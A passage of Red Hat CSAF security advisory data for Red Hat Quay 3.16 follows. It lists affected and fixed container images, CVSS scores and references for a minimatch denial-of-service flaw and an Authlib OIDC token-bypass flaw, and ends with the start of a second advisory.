"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442922"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "RHBZ#2442922",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
}
],
"release_date": "2026-02-26T01:07:42.693000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions"
},
{
"cve": "CVE-2026-28498",
"cwe": {
"id": "CWE-325",
"name": "Missing Cryptographic Step"
},
"discovery_date": "2026-03-16T19:02:00.128339+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448182"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect (OIDC) servers. This vulnerability allows a remote attacker to bypass critical integrity checks in OIDC ID Tokens. Specifically, the library\u0027s internal hash verification logic fails open when encountering an unsupported cryptographic algorithm, accepting a forged ID Token as valid. This can lead to an authentication bypass, granting unauthorized access to systems relying on Authlib for OIDC authentication.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "authlib: Authlib: Authentication bypass via forged OpenID Connect ID Tokens",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This IMPORTANT vulnerability in Authlib allows attackers to bypass OIDC ID Token integrity verification. The at_hash and c_hash validation fails open for unknown algorithms, accepting forged tokens as valid. Exploitation requires no authentication or user interaction. Impact is high to confidentiality and integrity. Red Hat products using Authlib for OIDC validation are affected. Fixed in version 1.6.9.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28498"
},
{
"category": "external",
"summary": "RHBZ#2448182",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448182"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28498",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28498"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b",
"url": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j"
}
],
"release_date": "2026-03-16T18:03:28.821000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Authentication bypass via forged OpenID Connect ID Tokens"
}
]
}
RHSA-2026:3107
Vulnerability from csaf_redhat - Published: 2026-02-23 17:16 - Updated: 2026-04-16 10:28A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
